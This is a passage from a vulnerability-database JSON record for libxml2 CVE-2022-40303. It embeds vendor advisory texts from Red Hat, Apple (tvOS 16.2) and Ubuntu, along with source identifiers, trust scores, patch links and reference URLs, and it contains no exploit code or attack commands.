packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-40303\nhttps://access.redhat.com/security/cve/CVE-2022-40304\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-12-13-7 tvOS 16.2\n\ntvOS 16.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213535. 
\n\nAccounts\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A user may be able to view sensitive user information\nDescription: This issue was addressed with improved data protection. \nCVE-2022-42843: Mickey Jin (@patch1t)\n\nAppleAVD\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Parsing a maliciously crafted video file may lead to kernel\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46694: Andrey Labunets and Nikita Tarakanov\n\nAppleMobileFileIntegrity\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to bypass Privacy preferences\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2022-42865: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nAVEVideoEncoder\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-42848: ABC Research s.r.o\n\nImageIO\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46693: Mickey Jin (@patch1t)\n\nImageIO\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Parsing a maliciously crafted TIFF file may lead to\ndisclosure of user information\nDescription: The issue was addressed with improved memory handling. 
\nCVE-2022-42851: Mickey Jin (@patch1t)\n\nIOHIDFamily\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2022-42864: Tommy Muir (@Muirey03)\n\nIOMobileFrameBuffer\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46690: John Aakerblom (@jaakerblom)\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2022-46689: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Connecting to a malicious NFS server may lead to arbitrary\ncode execution with kernel privileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2022-46701: Felix Poulin-Belanger\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause kernel code execution\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year\nLab\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges\nDescription: The issue was addressed with improved memory handling. 
\nCVE-2022-42845: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxml2\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An integer overflow was addressed through improved input\nvalidation. \nCVE-2022-40303: Maddie Stone of Google Project Zero\n\nlibxml2\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project\nZero\n\nPreferences\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to use arbitrary entitlements\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-42855: Ivan Fratric of Google Project Zero\n\nSafari\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Visiting a website that frames malicious content may lead to\nUI spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2022-46695: KirtiKumar Anandrao Ramchandani\n\nSoftware Update\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A user may be able to elevate privileges\nDescription: An access issue existed with privileged API calls. This\nissue was addressed with additional restrictions. \nCVE-2022-42849: Mickey Jin (@patch1t)\n\nWeather\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to read sensitive location information\nDescription: The issue was addressed with improved handling of\ncaches. 
\nCVE-2022-42866: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 245521\nCVE-2022-42867: Maddie Stone of Google Project Zero\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory consumption issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 245466\nCVE-2022-46691: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may bypass Same\nOrigin Policy\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 246783\nCVE-2022-46692: KirtiKumar Anandrao Ramchandani\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42852: hazbinhotel working with Trend Micro Zero Day\nInitiative\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. 
\nWebKit Bugzilla: 246942\nCVE-2022-46696: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 247562\nCVE-2022-46700: Samuel Gro\u00df of Google V8 Security\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs\n\u0026 DNSLab, Korea Univ. \n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 247420\nCVE-2022-46699: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 244622\nCVE-2022-42863: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited against versions of iOS released\nbefore iOS 15.1. \nDescription: A type confusion issue was addressed with improved state\nhandling. \nWebKit Bugzilla: 248266\nCVE-2022-42856: Cl\u00e9ment Lecigne of Google\u0027s Threat Analysis Group\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Zweig of Kunlun Lab for their\nassistance. \n\nSafari Extensions\nWe would like to acknowledge Oliver Dunk and Christian R. of\n1Password for their assistance. \n\nWebKit\nWe would like to acknowledge an anonymous researcher and scarlet for\ntheir assistance. \n\nApple TV will periodically check for software updates. 
Alternatively,\nyou may manually check for software updates by selecting \"Settings -\u003e\nSystem -\u003e Software Update -\u003e Update Software.\" To check the current\nversion of software, select \"Settings -\u003e General -\u003e About.\"\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke\nNxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq\nPae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V\nJvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou\ni2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y\neFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m\nKSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ\nlzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8\nRtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U\nsP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn\nCpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C\nsh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=\n=i2O9\n-----END PGP SIGNATURE-----\n\n\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be\n2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents\n2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets\n\n5. 
==========================================================================\nUbuntu Security Notice USN-5760-2\nDecember 05, 2022\n\nlibxml2 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in libxml2. This update provides the\ncorresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. \n\nOriginal advisory details:\n\n It was discovered that libxml2 incorrectly handled certain XML files. \n An attacker could possibly use this issue to expose sensitive information\n or cause a crash. \n An attacker could possibly use this issue to execute arbitrary code. \n (CVE-2022-40304)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n libxml2 2.9.3+dfsg1-1ubuntu0.7+esm4\n libxml2-utils 2.9.3+dfsg1-1ubuntu0.7+esm4\n\nUbuntu 14.04 ESM:\n libxml2 2.9.1+dfsg1-3ubuntu4.13+esm4\n libxml2-utils 2.9.1+dfsg1-3ubuntu4.13+esm4\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
},
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-429429",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-40303",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "170317",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170753",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171043",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170752",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170097",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170754",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170316",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169857",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170318",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169825",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170555",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171173",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169620",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170899",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170312",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170955",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169858",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169732",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171017",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170315",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171040",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171260",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1031",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-429429",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-40303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170668",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"id": "VAR-202210-0997",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:15:13.442000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-40303: Integer overflows with XML_PARSE_HUGE",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5e77d7ff7e5e68d6c261fad482d55aba"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-40303"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-40303"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-190",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20221209-0003/"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213531"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213533"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213534"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213535"
},
{
"trust": 1.1,
"url": "https://support.apple.com/kb/ht213536"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/21"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/24"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/25"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/26"
},
{
"trust": 1.1,
"url": "http://seclists.org/fulldisclosure/2022/dec/27"
},
{
"trust": 1.1,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/commit/c846986356fc149915a74972bf198abc266bc2c0"
},
{
"trust": 1.1,
"url": "https://gitlab.gnome.org/gnome/libxml2/-/tags/v2.10.3"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40304"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40303"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-43680"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42011"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-35737"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-46848"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42010"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-42012"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-43680"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22482"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-35737"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42010"
},
{
"trust": 0.3,
"url": "https://docs.openshift.com/container-platform/latest/cicd/gitops/understanding-openshift-gitops.html"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42011"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-47629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3821"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3821"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1022224"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-46285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2953"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-48303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2879"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2880"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2869"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4415"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:1174"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4883"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-44617"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2058"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26716"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41715"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27406"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2056"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2868"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1122"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22662"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2867"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2519"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2057"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0468"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0466"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0467"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-22736"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0338"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://www.apple.com/support/security/pgp/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42849"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42848"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42842"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42855"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42845"
},
{
"trust": 0.1,
"url": "https://support.apple.com/en-us/ht201222"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42865"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42863"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42851"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42843"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42852"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42856"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-42864"
},
{
"trust": 0.1,
"url": "https://support.apple.com/ht213535"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-4238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-23947"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23521"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-47629"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3064"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4238"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2023-23947"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0803"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41903"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5760-2"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5760-1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-429429",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-40303",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171310",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170754",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170753",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170752",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170668",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170317",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "171043",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170097",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-40303",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
